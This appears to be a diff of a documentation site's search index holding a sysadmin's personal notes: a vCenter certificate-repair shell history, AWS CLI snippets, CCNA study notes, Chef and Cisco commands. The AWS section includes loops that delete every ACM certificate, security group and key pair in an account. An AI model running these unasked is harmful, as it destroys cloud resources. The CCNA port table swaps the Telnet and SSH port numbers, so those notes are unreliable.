grep vcenter 46 ls 47 ls -alh 48 cat ssoserverRoot.crt 49 htop 50 top 51 service-control --status 52 toptop 53 top 54 service-control --status 55 watch -n 1 \"service-control --status\" 56 cd /etc/ssl/certs 57 ls 58 ls -alh 59 service-control 60 service-control --help 61 service-control --start vmware-vapi-endpoint 62 service-control 63 service-control --list-status 64 service-control --status 65 /usr/lib/vmware-vmafd/bin/dir-cli 66 cd /usr/lib/vmware-vmafd/bin/dir-cli 67 tail -n 100 /var/log/vmware/vpxd/vpxd.log 68 date 69 tail -n 100 /var/log/vmware/vpxd/vpxd.log 70 grep -ir ssl /var/log/vmware/vpxd/vpxd.log 71 cd /etc/vm 72 cd /etc/vmware 73 ls 74 cat backup/ 75 cat .buildInfo 76 /usr/lib/vmware-vmca/bin/certificate-manager 77 cd /tmp/vmware-root 78 ls 79 cd /var/log/vmware 80 ls 81 tail -n 100 vpxd/vpxd.log 82 service-control --status 83 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store TRUSTED_ROOTS --text | 
less 84 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text | less 85 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 86 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 87 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vpxd --text | less 88 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vsphere-webclient --text | less 89 cd /tmp/ 90 vi fixsts.sh 91 chmod +x fixsts.sh 92 ./fixsts.sh 93 service-control --stop --all 94 service-control --start --all 95 top 96 cd /var/log/vmware/vapi/ 97 ls 98 cd endpoint/ 99 ls 100 tail -n 100 -f endpoint.log 101 /usr/lib/vmware-vmca/bin/certificate-manager 102 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 103 ping vcenter.colo.coldnorthadmin.com 104 reset 105 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 106 /usr/lib/vmware-vmca/bin/certificate-manager 107 cat /etc/hostname 108 /usr/lib/vmware-vmca/bin/certificate-manager 109 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 110 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://localhost:7080/lookupservice/sdk | less 111 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 112 ls /usr/lib/vmidentity/tools/scripts/lstool.py 113 ls /usr/lib/vmware-lookupsvc/tools/lstool.py 114 python /usr/lib/vmware-lookupsvc/tools/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 115 clear 116 cd /usr/lib/vmware/site-packages/cis 117 ls 118 cp certificateManagerHelper.py certificateManagerHelper.py.bak 119 vi certificateManagerHelper.py 120 reset 121 /usr/lib/vmware-vmca/bin/certificate-manager 122 clear 123 htop 124 clear 125 df -h 126 history

    "},{"location":"wireshark/","title":"Wireshark","text":""},{"location":"wireshark/#get-packets-containing-a-specific-string","title":"Get packets containing a specific string.","text":"
    frame contains potato\n
    "}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Home","text":""},{"location":"aws-cli/","title":"AWS","text":""},{"location":"aws-cli/#acm","title":"ACM","text":"

    Useful things - Use no-cli-pager to send the result directly to the terminal and not to less - There is a bug for the help menu --> https://github.com/aws/aws-cli/issues/4972 - You can send it to cat as a workaround --> aws ec2 help | cat - There is an autocomplete built into the CLI - You can use --cli-auto-prompt with each prompt

    "},{"location":"aws-cli/#list-certificates","title":"List certificates","text":"
    aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn'\n
    "},{"location":"aws-cli/#acm-delete-certificates","title":"ACM Delete certificates","text":"
    for arn in $(aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn' | jq -r '.[]'); do aws acm delete-certificate --certificate-arn \"$arn\"; done\n
    "},{"location":"aws-cli/#codecommit","title":"CodeCommit","text":"

    Note, this service is deprecated by AWS. You should stop current usage and migrate to SCM alternatives (Gitlab, Github and others)

    "},{"location":"aws-cli/#list-repositories","title":"List repositories","text":"
    aws codecommit list-repositories --no-cli-pager\n
    "},{"location":"aws-cli/#delete-repositories","title":"Delete repositories","text":"
    aws codecommit delete-repository --repository-name gremlins-api\n
    "},{"location":"aws-cli/#api-gateway","title":"API Gateway","text":"

    Note the apigatewayv2 in some cases

    Get a custom domain name

    aws apigateway get-domain-names --no-cli-pager --query 'items[*]['regionalCertificateArn','domainName']' | jq -r '.[]'\n

    Delete a custom domain name

    aws apigateway delete-domain-name --domain-name sig.coldnorthadmin.com\n

    Get an API

    aws apigatewayv2 get-apis --query 'Items[*]['ApiId']' --no-cli-pager\n

    Delete an API

    aws apigatewayv2 delete-api --api-id 80wxwwwn2l\n
    "},{"location":"aws-cli/#ec2","title":"EC2","text":""},{"location":"aws-cli/#delete-security-groups","title":"Delete Security Groups","text":"
    aws ec2 describe-security-groups --query \"SecurityGroups[*].GroupName\" --no-cli-pager --output json | jq -r '.[]' | while IFS= read -r sg; do aws ec2 delete-security-group --group-name $sg; done \n
    "},{"location":"aws-cli/#delete-key-pairs","title":"Delete key pairs","text":"
    aws ec2 describe-key-pairs --query \"KeyPairs[*].KeyName\" --no-cli-pager | jq -r '.[]' | while IFS= read -r key; do aws ec2 delete-key-pair --key-name $key --no-cli-pager; done\n
    "},{"location":"bluetooth/","title":"Bluetooth","text":"

    Ubuntu reference https://wiki.ubuntu.com/DebuggingBluetooth#:~:text=On%20desktop%3A,%2Fvar%2Flog%2Fsyslog

    "},{"location":"bluetooth/#basic-bluetooth-troubleshooting-commands","title":"Basic bluetooth troubleshooting commands","text":"
    bluetoothctl --version\n
    hciconfig -a\n
    bluetoothctl\n[bluetooth]# show\n[bluetooth]# devices\n[bluetooth]# info <mac addr of any device you have problems with>\n
    rfkill list\nNecessary bluetooth log files in debug mode as per below\n
    "},{"location":"ccna/","title":"Cisco-CCNA","text":""},{"location":"ccna/#ethernet-and-frames","title":"Ethernet and Frames","text":""},{"location":"ccna/#ethernet-type-field","title":"Ethernet \"Type\" field","text":"

    Hub = port needs to be at half-duplex

    "},{"location":"ccna/#cisco-security","title":"Cisco Security","text":""},{"location":"ccna/#user-and-access-management","title":"User and access management","text":"

    Enable secret takes precedence over enable password.

    enable password potato\nenable secret potato2\n\nenable password = potato2\n

    Enable AAA (allow user with privilege 15 to login straight into enable mode)

    conf t\naaa new-model\naaa authentication login default group local\naaa authorization exec default group local\n

    Create user with default privilege 15 level

    conf t\nusername $USERNAME privilege 15 secret $PASSWORD\n

    login = password and username of the vty itself. login local = Local username database

    conf t\nline con 0\nlogin local\nexec-timeout 0 0\nlogging synchronous\n

    Line VTY user are set to privilege 15 automatically.

    conf t\nline vty 0 15\nprivilege level 15\n

    \"Encrypt\" passwords in the startup-config.

    service password-encryption\n
    "},{"location":"ccna/#port-security","title":"Port-Security","text":"

    Enabling port security on port Cannot be enabled on a trunk/dynamic/auto port. Must be an access port.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\n

    Keep MAC addresses when port-shutdown or switch reload.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\nswitchport port-security mac-address sticky\n
    "},{"location":"ccna/#mac-aging","title":"MAC aging","text":"

    Dynamic MAC aging default = 0 absolute timer = Counts down irregardless of traffic inactivity timer = resets when traffic is seen from MAC. maximum - Default 1 If you raise the number of max MAC addresses on a port, you can run static and dynamic MAC detection.

    "},{"location":"ccna/#mac-address-conversion","title":"MAC address conversion","text":"Character HEX a 10 b 11 c 12 d 13 e 14 f 15

    Hexadecimal A7 to decimal A = 10 units of 16 (A=16) ---> 160 7 = 7 units of 1 ---> 7 160 + 7 = 167

    Decimal 241 to Hexadecimal 1. f = 15 * 16 2. 1 = 1 * 1 3. F1

    "},{"location":"ccna/#violation-option","title":"Violation option","text":"

    protect - Drops traffic, no SYSLOG, no SNMP Trap, no counters increased restrict - Drops traffic, generate SNMP trap, generate SYSLOG. shutdown - Default, increase violation counters, Port shutdown in error-disabled.

    Show port-security commands

    show port-security interface fastethernet 0/1\n
    show port-security address\n

    Error disabled recovery Default recovery 300 seconds

    conf t\nerrordisable recovery cause ?\nerrordisable recovery cause psecure-violation\nerrdisable recovery interval 30\n
    show errdisable recovery\n
    "},{"location":"ccna/#vlan-interfaces-svi","title":"VLAN interfaces (SVI)","text":""},{"location":"ccna/#autonegociation-speed-and-duplex","title":"Autonegociation - Speed and Duplex","text":""},{"location":"ccna/#interface-range","title":"Interface range","text":"
    interface range fastethernet 0/1-24\ninterface range fastethernet 0/1-24,25,26\n
    "},{"location":"ccna/#tcp-and-udp","title":"TCP and UDP","text":""},{"location":"ccna/#tcp","title":"TCP","text":""},{"location":"ccna/#udp","title":"UDP","text":""},{"location":"ccna/#port-numbers","title":"Port Numbers","text":"

    Well-known port numbers:

    Protocol / Transport Port HTTPS / TCP 443 SNMP / UDP 161 SMTP / TCP 25 TELNET / TCP 22 SSH / TCP 23

    Socket ---> Combination of an ipaddress and a port number. 192.168.1.1:10000

    "},{"location":"ccna/#dhcp","title":"DHCP","text":"

    DORA 1. Discover - Broadcast from client. 2. Offer - DHCP server receives Discover and sends unicast offer to client. 3. Request - Client sends request for the offered IP address. 4. Ack - DHCP server ack the client request and assigns the IP.

    "},{"location":"ccna/#routing-static-routes","title":"Routing - Static Routes","text":"
    ip route destination_subnet destination_mask [local-router-exit-interface | next-hop-ip-address]\n\nip route 2.2.2.2 255.255.255.0 192.168.1.1\n\n#Default Route\nip route 0.0.0.0 0.0.0.0 [local-router-exit-interface | next-hop-ip-address]\n
    "},{"location":"ccna/#routing-distance-vector-protocols-rip","title":"Routing - Distance Vector Protocols - RIP","text":"

    RIPv1 / IGRP

    RIPv2

    Split Horizon

    Route Poisoning

    Hops

    "},{"location":"ccna/#enabling-ripv2","title":"Enabling RIPv2","text":"
    conf t\nrouter rip\n\n#Show protocols active on router\nshow ip protocols\n\n#Enable specific version of RIPv2 per interface or global.\ninterface gig0/1\nip rip send version 2\n\nconf t\nrouter rip\nrip version 2\nnetwork 10.10.10.0\nnetwork 10.10.11.0\n\n#Disable auto summary\nconf t\nrouter rip\nno auto-summary\n\n#Enable split Horizon\ninterface serial0/1/0\nip split-horizon\n

    Confirming that RIPV2 works.

    show ip protocols\nshow ip rip database\n

    Clear RIP routes.

    clear ip route *\n
    "},{"location":"ccna/#passive-interfaces","title":"Passive interfaces","text":"

    Prevents sending RIPv2 updates from interfaces where it's not necessary.

    conf t\nrouter rip\npassive-interface fastethernet0/1\npassive-interface fastethernet0/2\n
    conf t\nrouter rip\npassive-interface default\nno passive-interface fastethernet0/1\nno passive-interface fastethernet0/2\n
    "},{"location":"ccna/#rip-load-balancing","title":"RIP Load Balancing","text":"

    1) If a subnet is reachable through two paths with the same hope count --> Load balance across the two links.

    Disabling equal cost load balancing

    conf t\nrouter rip\nmaximum-path 1\n
    "},{"location":"ccna/#default-route-in-rip","title":"Default route in RIP","text":"
    conf t\nrouter rip\ndefault-information originate\n
    "},{"location":"ccna/#routing-administrative-distance","title":"Routing Administrative distance","text":"

    1) The prefix mask is considered first. The more specific route is installed. 2) If the prefix max is \"=\" ---> Administrative Distance is checked. The route with the lowest ADs wins.

    "},{"location":"ccna/#floating-static-routes","title":"Floating static routes","text":"

    If a route with a lower AD is removed from the routing table, the static route will be added and become active.

    conf t\nip route 2.2.2.0 255.255.255.0 21.1.1.2 [static route metric here | higher than routing protocol 1-255 ]\n
    "},{"location":"ccna/#subnetting","title":"Subnetting","text":"128 64 32 16 8 4 2 1 45 0 0 0 0 1 1 0 1

    200.17.100.3

    128 64 32 16 8 4 2 1 200 1 1 0 0 1 0 0 0 17 0 0 0 1 0 0 0 1 100 0 1 1 0 0 1 0 0 3 0 0 0 0 0 0 1 1

    11001000.00010001.01100100.00000011

    "},{"location":"ccna/#network-class","title":"Network class","text":"Class A Class B Class C 1st Octet range 1 - 126 128 - 191 192 - 223 Network Mask 255.0.0.0 - /8 255.255.0.0 - /16 255.255.255.0 - /24"},{"location":"ccna/#number-of-subnet-in-a-network-200110-27","title":"Number of subnet in a network - 200.1.1.0 /27","text":"
    1. Find the class of the subnet --> Class C (+192)
    2. A class C is a /24 by default.
    3. /27 - /24 = 3 subnet bits.
    4. Number of subnet --> 2^Number_subnet_bits_remaining --> 2^3 --> 2 * 2 * 2 = 8 subnets
    "},{"location":"ccna/#number-of-hosts-per-subnet-200110-27","title":"Number of hosts per subnet - 200.1.1.0 /27","text":"
    1. Find the number of host bits --> /32 - /27 --> /5 host bits
    2. Find the number of valid host per subnet - remove subnet and broadcast address.
    3. (2^(number of host bits))-2 --> 2^5 --> 2 * 2 * 2 * 2 * 2 --> 32 - 2 --> 30
    "},{"location":"ccna/#find-the-subnet-of-an-ip-address-101721418","title":"Find the Subnet of an IP address - 10.17.2.14/18","text":"
    1. /18 = First two octets = 16 bits + 2 bits from third octet
    2. 10.17.00000010
    3. 10.17.00 000000 --> Total of 18 bits for subnet address
    4. Subnet address = 10.17.0.0/18
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-210461100-25","title":"Find the broadcast and range of valid addresses in subnet - 210.46.110.0 /25","text":"
    1. /32 - /25 = last 7 bits --> host bits
    2. 01111111 --> 64 + 32 +16 +8 + 4 + 2 +1 --> 96 + 16 + 15 --> 96 + 31 --> Broadcast = 210.46.110.127
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-15010640-18","title":"Find the broadcast and range of valid addresses in subnet - 150.10.64.0 /18","text":"
    1. /32 - /18 = last 14 bits --> host bits
    128 64 32 16 8 4 2 1 64 0 1 0 0 0 0 0 0
    1. Broadcast --> 150.10.01111111.11111111 --> 150.10.127.255
    2. Range of valid addresses --> 150.10.64.1 to 150.10.127.254
    "},{"location":"ccna/#access-lists","title":"Access Lists","text":""},{"location":"ccna/#wildcard-masks","title":"Wildcard masks","text":""},{"location":"ccna/#standard-acl","title":"Standard ACL","text":"
    <1-99>       Standard IP access-list number\n<1300-1999>  Standard IP access-list number (expanded range)\nWORD         Access-list name\n
    ip access-list standard 5 deny 3.3.3.0 0.0.0.255\ninterface fastethernet0\nip access-group 5 in\n
    "},{"location":"ccna/#extended-acl","title":"Extended ACL","text":""},{"location":"ccna/#named-extendedstandard-acl","title":"Named Extended/Standard ACL","text":"
    conf t\nip access-list extended BLOCK11\ndeny ip 3.3.3.0 0.0.0.255 11.11.11.0 0.0.0.255\npermet ip any any\n
    "},{"location":"ccna/#acl-on-vty-lines","title":"ACL on VTY lines","text":"
    conf t\nline vty 0 14\naccess-class MGMT-NETWORKS in\n
    "},{"location":"ccna/#acl-sequence-numbers","title":"ACL Sequence numbers","text":"
    conf t\nip access-list extended 101\nno $SEQUENCE_NUMVER\n
    "},{"location":"ccna/#where-to-apply-acls","title":"Where to apply ACLs","text":""},{"location":"ccna/#ntp-network-time-protocol","title":"NTP - Network Time Protocol","text":""},{"location":"ccna/#stratum-level-of-accuracy-of-the-ntp-server","title":"Stratum - Level of accuracy of the NTP server.","text":""},{"location":"ccna/#ntp-modes","title":"NTP Modes","text":"
    !*** Set the device itself as the master NTP server.\nconf t\nntp master\n
    !*** Set the NTP server for the device.\nconf t\nntp server ntp.nist.ca\n
    conf t\nntp peer ntp.potato.com\n
    !*** Show all ntp services from which the device will sync it's clock. Also shows the preferred device.\nshow ntp associations\n\nshow ntp status\n\nshow clock\n
    !*** Under device interface configuration.\n!*** Sets broadcast server mode (send updates)\nconf t\ninterface serial 0/1/0\nntp broadcast\n\n\n!*** Set client broadcast mode\nconf t\ninterface serial 0/1/0\nntp broadcast client\n
    "},{"location":"ccna/#nat-pat-network-address-translation-port-address-translation","title":"NAT / PAT - Network Address Translation / Port Address Translation","text":""},{"location":"ccna/#static-nat","title":"Static NAT","text":"
    !*** Place on the interfaces closest to the hosts.\nip nat inside\n\n!*** Place on the WAN interface.\nip nat outside\n\n!*** Setup Static NAT / One to one mapping\nip nat inside source static 10.1.1.2 200.1.1.1\n\n\n!*** Show translations\nshow ip nat translations\n\n!*** Show NAT statistics\nshow ip nat statistics\n\n!*** clear ip nat table to reset the NAT mappings\nclear ip nat translations *\n
    "},{"location":"ccna/#dynamic-nat","title":"Dynamic NAT","text":"

    Allow the NAT of a pool of internal address to a pool of outside addresses.

    !*** Create IP NAT Pool\nip nat pool CCNA 200.1.1.1 200.1.1.5 prefix-length 24\n\n!*** Create the access-list of internal host that will be NAT.\naccess-list 2 permit host 10.1.1.2\naccess-list 2 permit host 10.1.1.22\n\n!*** Create the NAT function for the access-list 2 and the pool CCNA  \nip nat inside source list 2 pool CCNA\n
    "},{"location":"ccna/#port-address-translation-nat-overload","title":"Port address translation - NAT Overload","text":"

    Allows the mapping of multiple inside addresses to a single outside address using a combination of the IP address / Port Number in ordre to uniquely identify each flow of data.

    !*** Overload of the inside addresses to the outside address\nip nat inside source list 2 interface serial0/1/0 overload\n
    "},{"location":"ccna/#ipv6","title":"IPv6","text":""},{"location":"ccna/#compressing-ipv6-addresses","title":"Compressing IPv6 addresses","text":""},{"location":"ccna/#assigning-ipv6-addresses-to-interfaces","title":"Assigning IPv6 addresses to interfaces","text":"
    !### Enable IPv6 Routing for the router.\nipv6 unicast-routing\n\n!### Assign an IPv6 address to an interface\ninterface fastethernet0/1\nipv6 address 2001:1111:2222:1::1/64\n
    "},{"location":"ccna/#types-of-ipv6-addresses","title":"Types of IPv6 addresses.","text":""},{"location":"ccna/#eui-64-process","title":"EUI-64 Process","text":"
    1. Take MAC address of the interface
    2. 11-22-33-aa-bb-cc
    3. Divide in half and insert FFFE.
    4. 11-22-33-FF-FE-AA-BB-CC
    5. 1122:33FF:FEAA:BBCC
    6. Do the bit inversion (invert the 7th bit of the address)
    7. 1122:33FF:FEAA:BBCC --> 1322:33FF:FEAA:BBCC
    "},{"location":"ccna/#use-eui-64-process-for-global-unicast-address","title":"Use EUI-64 process for global unicast address.","text":"
    ipv6 address 2001:1111:2222:1::/64 eui-64\n
    "},{"location":"ccna/#ipv6-ndp-neighbor-discovery-process","title":"IPv6 NDP - Neighbor Discovery Process","text":""},{"location":"ccna/#ndp-router-discovery","title":"NDP - Router Discovery","text":"
    1. Hosts multicast packet - Router Solicitation (RS) message - Destination address FF02::2 - All-IPv6-Routers address
    2. Routers receives RS on FF02::2 and sends RA (Router Advertisement).
    3. If the soliciting node HAS an IPv6 address --> RA is unicast to the host.
    4. If the soliciting node DOES NOT have an IPv6 address --> RA is sent to FF02::1 - \"All-IPV6-Nodes\"
    5. RA are also sent to FF02::1 every 200 seconds.
    6. FF02::1 --> All IPv6 hosts.
    "},{"location":"ccna/#ndp-host-discovery","title":"NDP - Host Discovery","text":""},{"location":"ccna/#dhcp-and-ipv6","title":"DHCP and IPv6","text":""},{"location":"ccna/#stateful-dhcp","title":"Stateful DHCP","text":"

    Stateful DHCP does not send \"Default Gateway\" in the DHCP lease. That part is discovered during the NDP process with NA and NS messages.

    "},{"location":"ccna/#stateless-dhcp","title":"Stateless DHCP","text":""},{"location":"ccna/#ipv6-duplicate-address-detection-dad","title":"IPv6 - Duplicate Address Detection - DAD","text":"

    Prevents duplicate addresses from being used on the network. 1. The host will send an NS (with the source address all :: - 128 zeros - unspecified ipv6 address) to the address it wants to use to FF02::1 (All IPV6 nodes) 2. If it gets a response, it means that a host is already using that address.

    "},{"location":"ccna/#ipv6-packet-header","title":"IPv6 Packet Header","text":""},{"location":"ccna/#logging-and-timestamps","title":"Logging and Timestamps","text":"

    Change the aspect and format of timestamps for SYSLOG and DEBUG message.

    service timestamps log datetime\n\n!### Add year to log timestamps.\nservice timestamps log datetime year\n\n!### Add millisecond to log timestamps.\nservice timestamps log datetime msec\n\nservice timestamps log datetime year msec show-timezone\n
    "},{"location":"ccna/#logging-to-remote-server","title":"Logging to remote server","text":"

    Enable logging to the console.

    logging console\n

    Enable buffered logging. Local buffer on the server.

    logging buffer\n

    Enable logging to a remote server.

    logging host $SYSLOG_SERVER_IPADDRESS\n

    Enable console logging on SSH/Telnet session

    conf t\nlogging monitor\nexit\nterminal monitor\n
    "},{"location":"ccna/#banner-configuration","title":"Banner configuration","text":"

    Three types of banners.

    "},{"location":"ccna/#cdp-cisco-discovery-protocol","title":"CDP - Cisco Discovery Protocol","text":"
    show cdp neighbors\nshow cdp neighbors details\nshow cdp entry $REMOTE_DEVICE_HOSTNAME\n\n!*** Enable CDP globally.\ncdp run\nno cdp run\n\n!*** Enable CDP on an interface\ninterface fastethernet0/0\ncdp enable\nno cdp enable\n\n!*** Show CDP information\nshow cdp information\nshow cdp interface fastethernet 0/0\n
    "},{"location":"ccna/#lldp-link-layer-discovery-protocols","title":"LLDP - Link Layer Discovery Protocols","text":"

    You can disable the received and transmit of LLDP packets per interface. That is not possible for CDP.

    show lldp\n\nconf t\nlldp run\n\nshow lldp neighbor detail\n

    "},{"location":"ccna/#confreg-register-and-password-recovery","title":"Confreg Register and Password Recovery","text":"
    show version | include register\nconfig-register 0x2142\n
    "},{"location":"chef/","title":"Chef","text":""},{"location":"chef/#chef-server-setup","title":"Chef server setup","text":"
    sudo dpkg -i /tmp/chef-server-core-<version>.deb\nchef-server-ctl reconfigure\nchef-server-ctl user-create USER_NAME FIRST_NAME LAST_NAME EMAIL 'PASSWORD' --filename FILE_NAME\nchef-server-ctl org-create northernsysadmin 'Northern Sysadmin Inc' --association_user sysadmin --filename /var/chef_ssh/northernsysadmin-validator.pem\n
    knife ssl check\nknife ssl fetch\n\nknife cookbook upload $COOKBOOK_NAME_HERE\nknife client list\nknife cookbook list\n
    knife bootstrap 10.255.255.8 --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1 --run-list 'recipe[learn_chef_apache2]'\n
    knife node list\nknife node show $NODE_NAME\n
    "},{"location":"chef/#create-roles-and-assign-cookbooks-to-them","title":"Create roles and assign cookbooks to them.","text":"

    roles/ntp.json

    {\n   \"name\": \"ntp\",\n   \"description\": \"NTP server role.\",\n   \"json_class\": \"Chef::Role\",\n   \"default_attributes\": {\n     \"chef_client\": {\n       \"interval\": 60,\n       \"splay\": 1\n     }\n   },\n   \"override_attributes\": {\n   },\n   \"chef_type\": \"role\",\n   \"run_list\": [\"recipe[chef-client::default]\",\n                \"recipe[chef-client::delete_validation]\",\n                \"recipe[ntpd::default]\"\n   ],\n   \"env_run_lists\": {\n   }\n}\n
    1. Upload the role to the Chef Server : knife role from file roles/web.json
    2. Check that the role is on the server : knife role list - knife role show ntp
    3. Find node name from knife node list - knife node run_list set puppet-minion1 \"role[ntp]\"
    4. Confirm that the role is applied to the Node : knife node show puppet-minion1 --run-list
    5. Run chef-client on the node.
    6. knife ssh 10.255.255.8 'role:web' 'sudo chef-client' --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1
    "},{"location":"chef/#dependencies-in-cookbooks","title":"Dependencies in cookbooks.","text":"

    metadata.rb - keyword \"depends\" - Used to list the other coobooks from which the cookbook depends to run properly.

    name 'prometheus_node'\nmaintainer 'Laurent Dumont'\nmaintainer_email 'ldumont@northernsysadmin.com'\nlicense 'All Rights Reserved'\ndescription 'Installs/Configures prometheus-node'\nlong_description 'Installs/Configures prometheus-node'\nversion '0.1.1'\ndepends 'tar'\nchef_version '>= 12.14' if respond_to?(:chef_version)\n
    "},{"location":"cisco/","title":"Cisco","text":""},{"location":"cisco/#general-troubleshooting","title":"General Troubleshooting","text":"

    IOS-XR

    show route vrf all 10.4.229.135/32\nshow route vrf all | inc 10.4.229. \nshow evpn evi vpn-id 11034\n
    #IPV4\nshow arp vrf $VRF_NAME  Te0/0/0/6.200\n\n#IPV6\nshow ipv6 neighbors vrf $VRF_NAME Te0/0/0/6.198\n
    show bgp vrf BMCE ipv6 unicast summary\nshow bgp vrf BMCE ipv4 unicast summary\n
    show bfd ipv6 session\nshow bfd ipv4 session\n
    show running-config  | utility egrep -C5 bfd\nshow isis neighbors\nshow bgp ipv4 all summary\n
    "},{"location":"cisco/#show-detailed-information-about-interface","title":"Show detailed information about interface","text":"
    show controllers TenGigE0/0/0/18\n
    "},{"location":"cisco/#show-control-plane-policing","title":"Show control plane policing","text":"
    show running-config control-plane\n

    !Check Policy-Map drops/number of packet matching the policy.

    show policy-map interface $PHYSICAL_INTERFACE service instance $SVC_INST_ID\n

    !Show l2vpn xconnect status (ASR 9k)

    show l2vpn service xconnect interface gigabitEthernet 0/1\n

    !Show l2vpn xconnect status with details (ASR 9k)

    show l2vpn xconnect neighbor 192.252.143.75 pw-id 702 detail\n

    !Show service-instance traffic details (not xconnect, just local service instance)

    show ethernet service instance id 205 int ten0/3/0 detail\n
    show mpls l2transport vc vcid 395 detail\n

    !ASR 9000 | IOS-XE

    show l2vpn service xconnect interface TenGigabitEthernet0/3/0\n
    show l2vpn xconnect group OPEN01 xc-name OPEN01-C220\n
    show l2vpn xconnect group PARA07 detail\n

    !BGP stuff | IOS-XE

    show bgp summary | inc NEIGHBOR_IP\n

    !BGP stuff | IOS-XR

    show ip bgp summary\nshow ip bgp neighbors\nshow ip bgp neighbors 1.1.1.1\n

    !Montrer les routes recu d'un neighbor en particulier

    conf t\nrouter bgp AS_NUMBER\n

    !Il faut activer le log des routes pour chacun des neighbors BGP concern\u00e9s

    neighbor 1.1.1.1 soft-reconfiguration inbound\nexit\nsh ip bgp neighbors 1.1.1.1 received-routes\nsh ip bgp neighbors 1.1.1.1 advertised-routes\n
    conf t\nrouter bgp AS_NUMBER\nneighbor 1.1.1.1 shutdown\n

    !Satellite 9k light levels

    show nV satellite status\ntelnet vrf **nVSatellite 10.0.100.1\n\n!GigabitEthernet112/0/0/17 ---> Satellite 112\ntelnet vrf **nVSatellite 10.0.112.1\n!Port 17 on ASR = Port 18 on Satellite\nsh satellite powerlevels port 18\n

    https://www.cisco.com/c/en/us/td/docs/routers/access/4400/troubleshooting/memorytroubleshooting/isr4000_mem.html https://www.cisco.com/c/en/us/support/docs/routers/4000-series-integrated-services-routers/210760-Monitor-CPU-Usage-On-ISR4300-Series.html

    show process cpu sorted | ex 0.0\n
    show platform hardware qfp active datapath utilization\n
    show platform software status control-processor\n
    show platform software status control-processor brief\n
    show processes cpu platform sorted\n
    show platform software status control-processor brief\n

    Show CPU and Memory like \"htop\" for Linux

    monitor platform software process rp active\n
    "},{"location":"cisco/#troubleshooting-cisco-isr-memory","title":"Troubleshooting Cisco ISR Memory.","text":"

    Show IOS processes memory usage.

    show processes memory\n

    Show platform CPU and Memory usage

    show platform resources\n

    Show IOS-XE Memory usage (not IOS)

    show platform software status control-processor brief\n
    "},{"location":"cisco/#cisco-barebones-iosxr-bgp-config","title":"Cisco barebones IOSXR BGP config","text":"
    router bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 remote-as 65505\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd fast-detect\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd multiplier 3\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd minimum-interval 100\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all in\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all out\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast as-override\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast soft-reconfiguration inbound always\n
    "},{"location":"cisco/#cisco-radius","title":"Cisco Radius","text":"
    conf t\naaa new-model\n\naaa group server radius DHMTL-RADIUS\n server-private 10.0.99.22 auth-port 1812 acct-port 1813 key $INSERT_KEY_HERE\n\naaa group server tacacs+ DHMTL-TACACS\n server-private 10.0.99.22 key $INSERT_KEY_HERE\n\naaa authentication login default group DHMTL-RADIUS local\naaa authorization exec default group DHMTL-RADIUS local\naaa accounting commands 15 default start-stop group DHMTL-TACACS\naaa accounting commands 3 default start-stop group DHMTL-TACACS\n
    "},{"location":"cisco/#activate-telnet-on-ios-xr","title":"Activate Telnet on IOS-XR","text":"
    telnet vrf management ipv4 server max-servers 10\ntelnet vrf $VRF_NAME ipv6 server max-servers $MAX_CONCURRENT_TELNET_CONNECTIONS\n
    "},{"location":"cumulus/","title":"Cumulus","text":""},{"location":"cumulus/#random-commands","title":"Random commands","text":"
